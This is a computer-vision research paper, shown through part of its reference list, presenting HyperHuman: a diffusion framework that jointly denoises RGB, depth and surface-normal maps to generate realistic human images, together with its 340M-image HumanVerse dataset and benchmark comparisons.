**HyperHuman: Hyper-Realistic Human Generation with Latent Structural Diffusion** Xian Liu\(^1,2\)*, Jian Ren\(^1\)† Aliaksandr Siarohin\(^1\) Ivan Skorokhodov\(^1\) Yanyu Li\(^1\) Dahua Lin\(^2\) Xihui Liu\(^3\) Ziwei Liu\(^4\) Sergey Tulyakov\(^1\) \(^1\)Snap Inc. \(^2\)CUHK \(^3\)HKU \(^4\)NTU Project Page: https://snap-research.github.io/HyperHuman **Abstract** Despite significant advances in large-scale text-to-image models, achieving hyper-realistic human image generation remains a desirable yet unsolved task. Existing models like Stable Diffusion and DALL-E 2 tend to generate human images with incoherent parts or unnatural poses. To tackle these challenges, our key insight is that human image is inherently structural over multiple granularities, from the coarse-level body skeleton to the fine-grained spatial geometry. Therefore, capturing such correlations between the explicit appearance and latent structure in one model is essential to generate coherent and natural human images. To this end, we propose a unified framework, **HyperHuman**, that generates in-the-wild human images of high realism and diverse layouts. Specifically, 1) we first build a large-scale human-centric dataset, named **HumanVerse**, which consists of 340M images with comprehensive annotations like human pose, depth, and surface-normal. 2) Next, we propose a **Latent Structural Diffusion Model** that simultaneously denoises the depth and surface-normal along with the synthesized RGB image. Our model enforces the joint learning of image appearance, spatial relationship, and geometry in a unified network, where each branch in the model complements to each other with both structural awareness and textural richness. 3) Finally, to further boost the visual quality, we propose a **Structure-Guided Refiner** to compose the predicted conditions for more detailed generation of higher resolution. Extensive experiments demonstrate that our framework yields the state-of-the-art performance, generating hyper-realistic human images under diverse scenarios. **1 Introduction** Generating hyper-realistic human images from user conditions, e.g., text and pose, is of great importance to various applications, such as image animation (Liu et al., 2019) and virtual try-on (Wang et al., 2018). To this end, many efforts explore the task of controllable human image generation. Early methods either resort to variational auto-encoders (VAEs) in a reconstruction manner (Ren et al., 2020), or improve the realism by generative adversarial networks (GANs) (Siarohin et al., 2019). Though some of them create high-quality images (Zhang et al., 2022; Jiang et al., 2022), the unstable training and limited model capacity confine them to small datasets of low diversity. Recent emergence of diffusion models (DMs) (Ho et al., 2020) has set a new paradigm for realistic synthesis and become the predominant architecture in Generative AI (Dhariwal & Nichol, 2021). Nevertheless, the exemplar text-to-image (T2I) models like Stable Diffusion (Rombach et al., 2022) and DALL-E 2 (Ramesh et al., 2022) still struggle to create human images with coherent anatomy, e.g., arms and legs, and natural poses. The main reason lies in that human is articulated with non-rigid deformations, requiring structural information that can hardly be depicted by text prompts. To enable structural control for image generation, recent works like ControlNet (Zhang & Agrawala, 2023) and T2I-Adapter (Mou et al., 2023) introduce a learnable branch to modulate the pre-trained DMs, e.g., Stable Diffusion, in a plug-and-play manner. However, these approaches suffer from the... Figure 1: Example Results and Visual Comparison. Top: The proposed HyperHuman simultaneously generates the coarse RGB, depth, normal, and high-resolution images conditioned on text and skeleton. Both photo-realistic images and stylistic renderings can be created. Bottom: We compare with recent T2I models, showing better realism, quality, diversity, and controllability. Note that in each $2 \times 2$ grid (left), the upper-left is input skeleton, while the others are jointly denoised normal, depth, and coarse RGB of $512 \times 512$. With full model, we synthesize images up to $1024 \times 1024$ (right). Please refer to Sec. A.15, A.16 for more comparison and results. Best viewed zoom in. feature discrepancy between the main and auxiliary branches, leading to inconsistency between the control signals (e.g., pose maps) and the generated images. To address the issue, HumanSD (Ju et al., 2023b) proposes to directly input body skeleton into the diffusion U-Net by channel-wise concatenation. However, it is confined to generating artistic style images of limited diversity. Besides, human images are synthesized only with pose control, while other structural information like depth maps and surface-normal maps are not considered. In a nutshell, previous studies either take a singular control signal as input condition, or treat different control signals separately as independent guidance, instead of modeling the multi-level correlations between human appearance and different types of structural information. Realistic human generation with coherent structure remains unsolved. In this paper, we propose a unified framework **HyperHuman** to generate in-the-wild human images of high realism and diverse layouts. The key insight is that *human image is inherently structural over multiple granularities, from the coarse-level body skeleton to fine-grained spatial geometry*. Therefore, capturing such correlations between the explicit appearance and latent structure in one model is essential to generate coherent and natural human images. Specifically, we first establish a large-scale human-centric dataset called **HumanVerse** that contains 340M in-the-wild human images of high quality and diversity. It has comprehensive annotations, such as the coarse-level body skeletons, the fine-grained depth and surface-normal maps, and the high-level image captions and attributes. Based on this, two modules are designed for hyper-realistic controllable human image generation. In **Latent Structural Diffusion Model**, we augment the pre-trained diffusion backbone to simultaneously denoise the RGB, depth, and normal. Appropriate network layers are chosen to be replicated as structural expert branches, so that the model can both handle input/output of different domains, and guarantee the spatial alignment among the denoised textures and structures. Thanks to such dedicated design, the image appearance, spatial relationship, and geometry are jointly modeled within a unified network, where each branch is complementary to each other with both structural awareness and textural richness. To generate monotonous depth and surface-normal that have similar values in local regions, we utilize an improved noise schedule to eliminate low-frequency information leakage. The same timestep is sampled for each branch to achieve better learning and feature fusion. With the spatially-aligned structure maps, in **Structure-Guided Refiner**, we compose the predicted conditions for detailed generation of high resolution. Moreover, we design a robust conditioning scheme to mitigate the effect of error accumulation in our two-stage generation pipeline. To summarize, our main contributions are three-fold: 1) We propose a novel **HyperHuman** framework for in-the-wild controllable human image generation of high realism. A large-scale human-centric dataset **HumanVerse** is curated with comprehensive annotations like human pose, depth, and surface normal. As one of the earliest attempts in human generation foundation model, we hope to benefit future research. 2) We propose the **Latent Structural Diffusion Model** to jointly capture the image appearance, spatial relationship, and geometry in a unified framework. The **Structure-Guided Refiner** is further devised to compose the predicted conditions for generation of better visual quality and higher resolution. 3) Extensive experiments demonstrate that our **HyperHuman** yields the state-of-the-art performance, generating hyper-realistic human images under diverse scenarios. ## Related Work ### Text-to-Image Diffusion Models Text-to-image (T2I) generation, the endeavor to synthesize high-fidelity images from natural language descriptions, has made remarkable strides in recent years. Distinguished by the superior scalability and stable training, diffusion-based T2I models have eclipsed conventional GANs in terms of performance (Dhariwal & Nichol, 2021), becoming the predominant choice in generation (Nichol et al., 2021; Saharia et al., 2022; Balaji et al., 2022; Li et al., 2023). By formulating the generation as an iterative denoising process (Ho et al., 2020), exemplar works like Stable Diffusion (Rombach et al., 2022) and DALL-E 2 (Ramesh et al., 2022) demonstrate unprecedented quality. Despite this, they mostly fail to create high-fidelity humans. One main reason is that existing models lack inherent structural awareness for human, making them even struggle to generate human of reasonable anatomy, e.g., correct number of arms and legs. To this end, our proposed approach explicitly models human structures within the latent space of diffusion model. ### Controllable Human Image Generation Traditional approaches for controllable human generation can be categorized into GAN-based (Zhu et al., 2017; Siarohin et al., 2019) and VAE-based (Ren et al., 2020; Yang et al., 2021), where the reference image and conditions are taken as input. To facilitate user-friendly applications, recent studies explore text prompts as generation guidance (Roy et al., 2022; Jiang et al., 2022), yet are confined to simple pose or style descriptions. The most relevant works that enable open-vocabulary pose-guided controllable human synthesis are ControlNet (Zhang & Agrawala, 2023), T2I-Adapter (Mou et al., 2023), and HumanSD (Ju et al., 2023b). However, they either suffer from inadequate pose control, or are confined to artistic styles of limited diversity. Besides, most previous studies merely take pose as input, while ignoring the multi-level correlations between human appearance and different types of structural information. In this work, we propose to incorporate structural awareness from coarse-level skeleton to fine-grained depth and surface-normal by joint denoising with expert branch, thus simultaneously capturing both the explicit appearance and latent structure in a unified framework for realistic human image synthesis. Figure 2: Overview of HyperHuman Framework. In Latent Structural Diffusion Model (purple), the image $x$, depth $d$, and surface-normal $n$ are jointly denoised conditioning on caption $c$ and pose skeleton $p$. For the notation simplicity, we denote pixel-/latent-space targets with the same variable. In Structure-Guided Refiner (blue), we compose the predicted conditions for higher-resolution generation. Note that the grey images refer to randomly dropout conditions for more robust training. Datasets for Human Image Generation. Large datasets are crucial for image generation. Existing human-centric collections are mainly confronted with following drawbacks: 1) Low-resolution of poor quality. For example, Market-1501 (Zheng et al., 2015) contains noisy pedestrian images of resolution $128 \times 64$, and VITON (Han et al., 2018) has human-clothing pairs of $256 \times 192$, which are inadequate for training high-definition models. 2) Limited diversity of certain domain. For example, SHHQ (Fu et al., 2022) is mostly composed of full-body humans with clean background, and DeepFashion (Liu et al., 2016) focuses on fashion images of little pose variations. 3) Insufficient dataset scale, where LIP (Gong et al., 2017) and Human-Art (Ju et al., 2023a) only contain 50K samples. Furthermore, none of the existing datasets contain rich annotations, which typically label a singular aspect of images. In this work, we take a step further by curating in-the-wild HumanVerse dataset with comprehensive annotations like human pose, depth map, and surface-normal map. 3 Our Approach We present HyperHuman that generates in-the-wild human images of high realism and diverse layouts. The overall framework is illustrated in Fig. 2. To make the content self-contained and narration clearer, we first introduce some pre-requisites of diffusion models and the problem setting in Sec. 3.1. Then, we present the Latent Structural Diffusion Model which simultaneously denoises the depth, surface-normal along with the RGB image. The explicit appearance and latent structure are thus jointly learned in a unified model (Sec. 3.2). Finally, we elaborate the Structure-Guided Refiner to compose the predicted conditions for detailed generation of higher resolution in Sec. 3.3. 3.1 Preliminaries and Problem Setting Diffusion Probabilistic Models define a forward diffusion process to gradually convert the sample $x$ from a real data distribution $p_{\text{data}}(x)$ into a noisy version, and learn the reverse generation process in an iterative denoising manner (Sohl-Dickstein et al., 2015; Song et al., 2020b). During the sampling stage, the model can transform Gaussian noise of normal distribution to real samples step-by-step. The denoising network $\epsilon_\theta(\cdot)$ estimates the additive Gaussian noise, which is typically structured as a UNet (Ronneberger et al., 2015) to minimize the ensemble of mean-squared error (Ho et al., 2020): $$\min_\theta \mathbb{E}_{x,c,\epsilon,t} \left[ w_t || \epsilon_\theta(\alpha_t x + \sigma_t \epsilon; c) - \epsilon ||_2^2 \right],$$ where $x, c \sim p_{\text{data}}$ are the sample-condition pairs from the training distribution; $\epsilon \sim \mathcal{N}(0, I)$ is the ground-truth noise; $t \sim \mathcal{U}[1, T]$ is the time-step and $T$ is the training step number; $\alpha_t$, $\sigma_t$, and $w_t$ are the terms that control the noise schedule and sample quality decided by the diffusion sampler. Latent Diffusion Model & Stable Diffusion. The widely-used latent diffusion model (LDM), with its improved version Stable Diffusion (Rombach et al., 2022), performs the denoising process in a separate latent space to reduce the computational cost. Specifically, a pre-trained VAE (Esser et al., 2021) first encodes the image $x$ to latent embedding $z = E(x)$ for DM training. At the inference stage, we can reconstruct the generated image through the decoder $\hat{x} = D(\hat{z})$. Such design enables the SD to scale up to broader datasets and larger model size, advancing from the SD 1.x & 2.x series to SDXL of heavier backbone on higher resolution (Podell et al., 2023). In this work, we extend SD 2.0 to Latent Structural Diffusion Model for efficient capturing of explicit appearance and latent structure, while the Structure-Guided Refiner is built on SDXL 1.0 for more pleasing visual quality. **Problem Setting for Controllable Human Generation.** Given a collection of $N$ human images $x$ with their captions $c$, we annotate the depth $d$, surface-normal $n$, and pose skeleton $p$ for each sample (details elaborated in Sec. 4). The training dataset can be denoted as $\{x_i, c_i, d_i, n_i, p_i\}_{i=1}^N$. In the first-stage Latent Structural Diffusion Model $G_1$, we estimate the RGB image $\hat{x}$, depth $\hat{d}$, and surface-normal $\hat{n}$ conditioned on the caption $c$ and skeleton $p$. In the second-stage Structure-Guided Refiner $G_2$, the predicted structures of $\hat{d}$ and $\hat{n}$ further serve as guidance for the generation of higher-resolution results $\hat{x}_{\text{high-res}}$. The training setting for our pipeline can be formulated as: $$\hat{x}, \hat{d}, \hat{n} = G_1(c, p), \quad \hat{x}_{\text{high-res}} = G_2(c, p, \hat{d}, \hat{n}).$$ During inference, only the text prompt and body skeleton are needed to synthesize well-aligned RGB image, depth, and surface-normal. Note that the users are free to substitute their own depth and surface-normal conditions to $G_2$ if applicable, enabling more flexible and controllable generation. ### 3.2 Latent Structural Diffusion Model To incorporate the body skeletons for pose control, the simplest way is by feature residual (Mou et al., 2023) or input concatenation (Ju et al., 2023b). However, three problems remain: **1)** The sparse keypoints only depict the coarse human structure, while the fine-grained geometry and foreground-background relationship are ignored. Besides, the naive DM training is merely supervised by RGB signals, which fails to capture the inherent structural information. **2)** The image RGB and structure representations are spatially aligned but substantially different in latent space. How to jointly model them remains challenging. **3)** In contrast to the colorful RGB images, the structure maps are mostly monotonous with similar values in local regions, which are hard to learn by DMs (Lin et al., 2023). **Unified Model for Simultaneous Denoising.** Our solution to the first problem is to simultaneously denoise the depth and surface-normal along with the synthesized RGB image. We choose them as additional learning targets due to two reasons: **1)** Depth and normal can be easily annotated for large-scale dataset, which are also used in recent controllable T2I generation (Zhang & Agrawala, 2023). **2)** As two commonly-used structural guidance, they complement the spatial relationship and geometry information, where the depth (Deng et al., 2022), normal (Wang et al., 2022), or both (Yu et al., 2022b) are proven beneficial in recent 3D studies. To this end, a naive method is to train three separate networks to denoise the RGB, depth, and normal individually. But the spatial alignment between them is hard to preserve. Therefore, we propose to capture the joint distribution in a unified model by simultaneous denoising, which can be trained with simplified objective (Ho et al., 2020): $$L_{\text{pred}} = \mathbb{E}_{x,d,n,c,p,e,t} \left[ ||\hat{\epsilon}_\theta(x_t; c, p) - \epsilon_x||_2^2 + ||\hat{\epsilon}_\theta(d_t; c, p) - \epsilon_d||_2^2 + ||\hat{\epsilon}_\theta(n_t; c, p) - \epsilon_n||_2^2 \right],$$ where $\epsilon_x$, $\epsilon_d$, and $\epsilon_n \sim \mathcal{N}(0, I)$ are three independently sampled Gaussian noise (shortened as $\epsilon$ in expectation for conciseness) for the RGB, depth, and normal, respectively; $x_t = \alpha_{tx} x + \sigma_{tx} \epsilon_x$, $d_t = \alpha_{td} d + \sigma_{td} \epsilon_d$, and $n_t = \alpha_{tn} n + \sigma_{tn} \epsilon_n$ are the noised feature maps of three learning targets; $t_x$, $t_d$, and $t_n \sim \mathcal{U}[1, T]$ are the sampled time-steps that control the scale of added Gaussian noise. **Structural Expert Branches with Shared Backbone.** The diffusion UNet contains down-sample, middle, and up-sample blocks, which are interleaved with convolution and self-/cross-attention layers. In particular, the DownBlocks compress input noisy latent to the hidden states of lower resolution, while the UpBlocks conversely upscale intermediate features to the predicted noise. Therefore, the most intuitive manner is to replicate the first several DownBlocks and the last several UpBlocks for each expert branch, which are the most neighboring layers to the input and output. In this way, each expert branch gradually maps input noisy latent of different domains (i.e., $x_t$, $d_t$, and $n_t$) to similar distribution for feature fusion. Then, after a series of shared modules, the same feature is distributed to each expert branch to output noises (i.e., $\epsilon_x$, $\epsilon_d$, and $\epsilon_n$) for spatially-aligned results. Furthermore, we find that the number of shared modules can trade-off between the spatial alignment and distribution learning: On the one hand, more shared layers guarantee the more similar features... of final output, leading to the paired texture and structure corresponding to the same image. On the other hand, the RGB, depth, and normal can be treated as different views of the same image, where predicting them from the same feature resembles an image-to-image translation task in essence. Empirically, we find the optimal design to replicate the \textit{conv\_in}, first \textit{DownBlock}, last \textit{UpBlock}, and \textit{conv\_out} for each expert branch, where each branch’s skip-connections are maintained separately (as depicted in Fig. 2). This yields both the spatial alignment and joint capture of image texture and structure. Note that such design is not limited to three targets, but can generalize to arbitrary number of paired distributions by simply involving more branches with little computation overhead. Noise Schedule for Joint Learning. A problem arises when we inspect the distribution of depth and surface-normal: After annotated by off-the-shelf estimators, they are regularized to certain data range with similar values in local regions, e.g., $[0, 1]$ for depth and unit vector for surface-normal. Such monotonous images may leak low-frequency signals like the mean of each channel during training. Besides, their latent distributions are divergent from that of RGB space, making them hard to exploit common noise schedules (Lin et al., 2023) and diffusion prior. Motivated by this, we first normalize the depth and normal latent features to the similar distribution of RGB latent, so that the pre-trained denoising knowledge can be adaptively used. The zero terminal SNR ($\alpha_T = 0, \sigma_T = 1$) is further enforced to eliminate structure map’s low-frequency information. Another question is how to sample time-step $t$ for each branch. An alternative is to perturb the data of different modalities with different levels (Bao et al., 2023), which samples different $t$ for each target as in Eq. 3. However, as we aim to jointly model RGB, depth, and normal, such strategy only gives $10^{-9}$ probability to sample each perturbation situation (given total steps $T = 1000$), which is too sparse to obtain good results. In contrast, we propose to densely sample with the same time-step $t$ for all the targets, so that the sampling sparsity and learning difficulty will not increase even when we learn more modalities. With the same noise level for each structural expert branch, intermediate features follow the similar distribution when they fuse in the shared backbone, which could better complement to each others. Finally, we utilize the v-prediction (Salimans & Ho, 2022) learning target as network objective: $$L_{v-pred} = \mathbb{E}_{x,d,n,c,p,v,t} \left[ ||\hat{v}_\theta(x_t; c, p) - v_x^*||_2^2 + ||\hat{v}_\theta(d_t; c, p) - v_d^*||_2^2 + ||\hat{v}_\theta(n_t; c, p) - v_n^*||_2^2 \right],$$ where $v_x^* = \alpha_t \epsilon_x - \sigma_t x$, $v_d^* = \alpha_t \epsilon_d - \sigma_t d$, and $v_n^* = \alpha_t \epsilon_n - \sigma_t n$ are the v-prediction learning targets at time-step $t$ for the RGB, depth, and normal, respectively. Overall, the unified simultaneous denoising network $\hat{v}_\theta$ with the structural expert branches, accompanied by the improved noise schedule and time-step sampling strategy give the first-stage Latent Structural Diffusion Model $G_1$. 3.3 Structure-Guided Refiner Compose Structures for Controllable Generation. With the unified latent structural diffusion model, spatially-aligned conditions of depth and surface-normal can be predicted. We then learn a refiner network to render high-quality image $\hat{x}^{high-res}$ by composing multi-conditions of caption $c$, pose skeleton $p$, the predicted depth $\hat{d}$, and the predicted surface-normal $\hat{n}$. In contrast to Zhang & Agrawala (2023) and Mou et al. (2023) that can only handle a singular condition per run, we propose to unify multiple control signals at the training phase. Specifically, we first project each condition from input image size (e.g., $1024 \times 1024$) to feature space vector that matches the size of SDXL (e.g., $128 \times 128$). Each condition is encoded via a light-weight embedder of four stacked convolutional layers with $4 \times 4$ kernels, $2 \times 2$ strides, and ReLU activation. Next, the embeddings from each branch are summed up coordinate-wise and further feed into the trainable copy of SDXL Encoder Blocks. Since involving more conditions only incurs negligible computational overhead of a tiny encoder network, our method can be trivially extended to new structural conditions. Although a recent work also incorporates multiple conditions in one model (Huang et al., 2023), they have to re-train the whole backbone, making the training cost unaffordable when scaling up to high resolution. Random Dropout for Robust Conditioning. Since the predicted depth and surface-normal conditions from $G_1$ may contain artifacts, a potential issue for such two-stage pipeline is the error accumulation, which typically leads to the train-test performance gap. To solve this problem, we propose to dropout structural maps for robust conditioning. In particular, we randomly mask out any of the control signals, such as replace text prompt with empty string, or substitute the structural maps with zero-value images. In this way, the model will not solely rely on a single guidance for synthesis, thus balancing the impact of each condition robustly. To sum up, the structure-composing refiner network with robust conditioning scheme constitute the second-stage Structure-Guided Refiner $G_2$. 4 HUMANVERSE DATASET Large-scale datasets with high quality samples, rich annotations, and diverse distribution are crucial for image generation tasks (Schuhmann et al., 2022; Podell et al., 2023), especially in the human domain (Liu et al., 2016; Fu et al., 2022). To facilitate controllable human generation of high-fidelity, we establish a comprehensive human dataset with extensive annotations named HumanVerse. Please kindly refer to Appendix A.17 for more details about the dataset and annotation resources we use. Dataset Preprocessing. We curate from two principled datasets: LAION-2B-en (Schuhmann et al., 2022) and COYO-700M (Byeon et al., 2022). To isolate human images, we employ YOLOS (Fang et al., 2021) for human detection. Specifically, only those images containing 1 to 3 human bounding boxes are retained, where people should be visible with an area ratio exceeding 15%. We further rule out samples of poor aesthetics (< 4.5) or low resolution (< 200 × 200). This yields a high-quality subset by eliminating blurry and over-small humans. Unlike existing models that mostly train on full-body humans of simple context (Zhang & Agrawala, 2023), our dataset encompasses a wider spectrum, including various backgrounds and partial human regions such as clothing and limbs. 2D Human Poses. 2D human poses (skeleton of joints), which serve as one of the most flexible and easiest obtainable coarse-level condition signals, are widely used in controllable human generation studies (Ju et al., 2023b; Zhu et al., 2023; Yu et al., 2023; Liu et al., 2023; 2022a;b;c). To achieve accurate keypoint annotations, we resort to MMPose (Contributors, 2020) as inference interface and choose ViTPose-H (Xu et al., 2022) as backbone that performs best over several pose estimation benchmarks. In particular, the per-instance bounding box, keypoint coordinates and confidence are labeled, including whole-body skeleton, body skeleton, hand, and facial landmarks. Depth and Surface-Normal Maps are fine-grained structures that reflect the spatial geometry of images (Wu et al., 2022), which are commonly used in conditional generation (Mou et al., 2023). We apply Omnidata (Eftekhari et al., 2021) for monocular depth and normal. The MiDaS (Ranftl et al., 2022) is further annotated following recent depth-to-image pipelines (Rombach et al., 2022). Outpaint for Accurate Annotations. Diffusion models have shown promising results on image inpainting and outpainting, where the appearance and structure of unseen regions can be hallucinated based on the visible parts. Motivated by this, we propose to outpaint each image for a more holistic view given that most off-the-shelf structure estimators are trained on the “complete” image views. Although the outpainted region may be imperfect with artifacts, it can complement a more comprehensive human structure. To this end, we utilize the powerful SD-Inpaint to outpaint the surrounding areas of the original canvas. These images are further processed by off-the-shelf estimators, where we only use the labeling within the original image region for more accurate annotations. Overall Statistics. In summary, COYO subset contains 90,948,474 (91M) images and LAION-2B subset contains 248,396,109 (248M) images, which is 18.12% and 20.77% of fullset, respectively. The whole annotation process takes 640 16/32G NVIDIA V100 GPUs for two weeks in parallel. 5 EXPERIMENTS Experimental Settings. For the comprehensive evaluation, we divide our comparisons into two settings: 1) Quantitative analysis. All the methods are tested on the same benchmark, using the same prompt with DDIM Scheduler (Song et al., 2020a) for 50 denoising steps to generate the same resolution images of $512 \times 512$. 2) Qualitative analysis. We generate high-resolution $1024 \times 1024$ results for each model with the officially provided best configurations, such as the prompt engineering, noise scheduler, and classifier-free guidance (CFG) scale. Note that we use the RGB output of the first-stage Latent Structural Diffusion Model for numerical comparison, while the improved results from the second-stage Structure-Guided Refiner are merely utilized for visual comparison. Datasets. We follow common practices in T2I generation (Yu et al., 2022a) and filter out a human subset from MS-COCO 2014 validation (Lin et al., 2014) for zero-shot evaluation. In particular, off-the-shelf human detector and pose estimator are used to obtain 8,236 images with clearly-visible humans for evaluation. All the ground truth images are resized and center-cropped to $512 \times 512$. To guarantee fair comparisons, we train first-stage Latent Structural Diffusion on HumanVerse, which is a subset of public LAION-2B and COYO, to report quantitative metrics. In addition, an internal dataset is adopted to train second-stage Structure-Guided Refiner only for visually pleasing results. Table 1: Zero-Shot Evaluation on MS-COCO 2014 Validation Human. We compare our model with recent SOTA general T2I models (Rombach et al., 2022; Podell et al., 2023; DeepFloyd, 2023) and controllable methods (Zhang & Agrawala, 2023; Mou et al., 2023; Ju et al., 2023b). Note that SDXL generates artistic style in 512, and IF only creates fixed-size images, we first generate $1024 \times 1024$ results, then resize back to $512 \times 512$ for these two methods. We bold the best and underline the second results for clarity. Our improvements over the second method are shown in red. | Methods | Image Quality | Alignment | Pose Accuracy | |------------------|---------------|-----------|---------------| | | FID ↓ | KID × 1k ↓ | FID_{CLIP} ↓ | CLIP ↑ | AP ↑ | AR ↑ | AP_{clean} ↑ | AR_{clean} ↑ | | SD 1.5 | 24.26 | 8.69 | 12.93 | 31.72 | - | - | - | - | | SD 2.0 | 22.98 | 9.45 | 11.41 | 32.13 | - | - | - | - | | SD 2.1 | 24.63 | 9.52 | 15.01 | 32.11 | - | - | - | - | | SDXL† | 29.08 | 12.16 | 19.00 | 32.90 | - | - | - | - | | DeepFloyd-IF‡ | 29.72 | 15.27 | 17.01 | 32.11 | - | - | - | - | | ControlNet | 27.16 | 10.29 | 15.59 | 31.60 | 20.46| 30.23| 25.92 | 38.67 | | T2I-Adapter | 23.54 | 7.98 | 11.95 | 32.16 | 27.54| 36.62| 34.86 | 46.53 | | HumanSD | 52.49 | 33.96 | 21.11 | 29.48 | 26.71| 36.85| 32.84 | 45.87 | | HyperHuman | **17.18** | **4.11** | **7.82** | **32.17**| **30.38**| **37.84**| **38.84**| **48.70**| Comparison Methods. We compare with two categories of open-source SOTA works: 1) General T2I models, including SD (Rombach et al., 2022) (SD 1.x & 2.x), SDXL (Podell et al., 2023), and IF (DeepFloyd, 2023). 2) Controllable methods with pose condition. Notably, ControlNet (Zhang & Agrawala, 2023) and T2I-Adapter (Mou et al., 2023) can handle multiple structural signals like canny, depth, and normal, where we take their skeleton-conditioned variant for comparison. HumanSD (Ju et al., 2023b) is the most recent work that specializes in pose-guided human generation. Implementation Details. We resize and random-crop the RGB, depth, and normal to the target resolution of each stage. To enforce the model with size and location awareness, the original image height/width and crop coordinates are embedded in a similar way to time embedding (Podell et al., 2023). Our code is developed based on diffusers (von Platen et al., 2022). 1) For the Latent Structural Diffusion, we fine-tune the whole UNet from the pretrained SD-2.0-base to v-prediction (Salimans & Ho, 2022) in $512 \times 512$ resolution. The DDIMScheduler with improved noise schedule is used for both training and sampling. We train on 128 80G NVIDIA A100 GPUs in a batch size of 2,048 for one week. 2) For the Structure-Guided Refiner, we choose SDXL-1.0-base as the frozen backbone and fine-tune to ε-prediction for high-resolution synthesis of $1024 \times 1024$. We train on 256 80G NVIDIA A100 GPUs in a batch size of 2,048 for one week. The whole two-stage inference process takes 12 seconds on a single 40G NVIDIA A100 GPU. The overall framework is optimized with AdamW (Kingma & Ba, 2015) in $1e^{-5}$ learning rate, and 0.01 weight decay. 5.1 Main Results Evaluation Metrics. We adopt commonly-used metrics to make comprehensive comparisons from three perspectives: 1) Image Quality. FID, KID, and FID_{CLIP} are used to reflect quality and diversity. 2) Text-Image Alignment, where the CLIP similarity between text and image embeddings is reported. 3) Pose Accuracy. We use the state-of-the-art pose estimator to extract poses from synthetic images and compare with the input (GT) pose conditions. The Average Precision (AP) and Average Recall (AR) are adopted to evaluate the pose alignment. Note that due to the noisy pose estimation of in-the-wild COCO, we also use AP_{clean} and AR_{clean} to only evaluate on the three most salient persons. Quantitative Analysis. We report zero-shot evaluation results in Tab. 1. For all methods, we use the default CFG scale of 7.5, which well balances the quality and diversity with appealing results. Thanks to the structural awareness from expert branches, our proposed HyperHuman outperforms previous works by a clear margin, achieving the best results on image quality and pose accuracy metrics and ranks second on CLIP score. Note that SDXL (Podell et al., 2023) uses two text encoders with $3\times$ larger UNet of more cross-attention layers, leading to superior text-image alignment. In spite of this, we still obtain an on-par CLIP score and surpass all the other baselines that have similar text encoder parameters. We also show the FID-CLIP and FID_{CLIP}-CLIP curves over multiple CFG scales in Fig. 3, where our model balances well between image quality and text-alignment, especially for the commonly-used CFG scales (bottom right). Please see Sec. A.1 for more quantitative results. Figure 3: Evaluation Curves on COCO-Val Human. We show FID-CLIP (left) and FID_{CLIP}-CLIP (right) curves with CFG scale ranging from 4.0 to 20.0 for all methods. Table 3: User Preference Comparisons. We report the ratio of users prefer our model to baselines. | Methods | SD 2.1 | SDXL | IF | ControlNet | T2I-Adapter | HumanSD | |------------------|--------|------|------|------------|-------------|---------| | HyperHuman | 89.24% | 60.45% | 82.45% | 92.33% | 98.06% | 99.08% | Qualitative Analysis. Fig. 1 shows results (top) and comparisons with baselines (bottom). We can generate both photo-realistic images and stylistic rendering, showing better realism, quality, diversity, and controllability. A comprehensive user study is further conducted as shown in Tab. 3, where the users prefer HyperHuman to the general and controllable T2I models. Please refer to Appendix A.4, A.15, and A.16 for more user study details, comparisons, and qualitative results. 5.2 Ablation Study In this section, we present the key ablation studies. Except for the image quality metrics, we also use the depth/normal prediction error as a proxy for spatial alignment between the synthesized RGB and structural maps. Specifically, we extract the depth and surface-normal by off-the-shelf estimator as pseudo ground truth. The $L^d_2$ and $L^n_2$ denote the $L_2$-error of depth and normal, respectively. Simultaneous Denoise with Expert Branch. We explore whether latent structural diffusion model helps, and how many layers to replicate in the structural expert branches: 1) Denoise RGB, that only learns to denoise an image. 2) Denoise RGB + Depth, which also predicts depth. 3) Denoise RGB + Normal, which also predicts surface-normal map. 4) Half DownBlock & UpBlock. We replicate half of the first DownBlock and the last UpBlock, which contains one down/up-sample ResBlock and one AttnBlock. 5) Two DownBlocks & UpBlocks, where we copy the first two DownBlocks and the last two UpBlocks. The results are shown in Tab. 2 (top), which prove that the joint learning of image appearance, spatial relationship, and geometry is beneficial. We also find that while fewer replicate layers give more spatially aligned results, the per-branch parameters are insufficient to capture distributions of each modality. In contrast, excessive replicate layers lead to less feature fusion across different targets, which fails to complement to each other branches. Noise Schedules. The ablation is conducted on two settings: 1) Default SNR with $\epsilon$-pred, where we use the original noise sampler schedules with $\epsilon$-prediction. 2) Different Timesteps $t$. We sample different noise levels ($t_x$, $t_d$, and $t_n$) for each modality. We can see from Tab. 2 (bottom) that zero-terminal SNR is important for learning of monotonous structural maps. Besides, different timesteps harm the performance with more sparse perturbation sampling and harder information sharing. 6 Discussion Conclusion. In this paper, we propose a novel framework HyperHuman to generate in-the-wild human images of high quality. To enforce the joint learning of image appearance, spatial relationship, and geometry in a unified network, we propose Latent Structural Diffusion Model that simultaneously denoises the depth and normal along with RGB. Then we devise Structure-Guided Refiner to compose the predicted conditions for detailed generation. Extensive experiments demonstrate that our framework yields superior performance, generating realistic humans under diverse scenarios. Limitation and Future Work. As an early attempt in human generation foundation model, our approach creates controllable human of high realism. However, due to the limited performance of existing pose/depth/normal estimators for in-the-wild humans, we find it sometimes fails to generate subtle details like finger and eyes. Besides, the current pipeline still requires body skeleton as input, where deep priors like LLMs can be explored to achieve text-to-pose generation in future work. 7 ACKNOWLEDGEMENT This study is supported by the Ministry of Education, Singapore, under its MOE AcRF Tier 2 (MOE-T2EP20221-0012) and NTU NAP. REFERENCES Yogesh Balaji, Seungjun Nah, Xun Huang, Arash Vahdat, Jiaming Song, Karsten Kreis, Miika Aittala, Timo Aila, Samuli Laine, Bryan Catanzaro, et al. ediffi: Text-to-image diffusion models with an ensemble of expert denoisers. arXiv preprint arXiv:2211.01324, 2022. Fan Bao, Shen Nie, Kaiwen Xue, Chongxuan Li, Shi Pu, Yaole Wang, Gang Yue, Yue Cao, Hang Su, and Jun Zhu. One transformer fits all distributions in multi-modal diffusion at scale. arXiv preprint arXiv:2303.06555, 2023. Mikołaj Bińkowski, Danica J Sutherland, Michael Arbel, and Arthur Gretton. Demystifying mmd gans. arXiv preprint arXiv:1801.01401, 2018. Minwoo Byeon, Beomhee Park, Haecheon Kim, Sungjun Lee, Woonhyuk Baek, and Saehoon Kim. Coyo-700m: Image-text pair dataset. https://github.com/kakaobrain/coyo-dataset, 2022. MMPose Contributors. Openmmlab pose estimation toolbox and benchmark. https://github.com/open-mmlab/mmpose, 2020. DeepFloyd. Deepfloyd if. Github Repository, 2023. URL https://github.com/deep-floyd/IF. Kangle Deng, Andrew Liu, Jun-Yan Zhu, and Deva Ramanan. 